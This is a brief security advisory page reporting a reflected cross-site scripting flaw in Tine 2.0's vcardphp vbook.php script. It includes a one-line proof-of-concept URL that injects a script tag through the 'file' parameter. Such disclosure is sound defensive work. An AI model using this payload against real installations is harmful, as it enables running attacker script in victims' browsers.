Home
Consulting
Exploits
Advisories
Software
Papers
Contact

Vulnerability Advisory

Software Vulnerability
Tine 2.0 Reflected Cross-site Scripting
Threat Tested On Date
1/5
Windows Vista + XAMPP 4/30/2011
Description
A vulnerability in Tine 2.0 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/tine/library/vcardphp/vbook.php?file=<script>alert(0)</script>

Copyright © 2018 AutoSec Tools LLC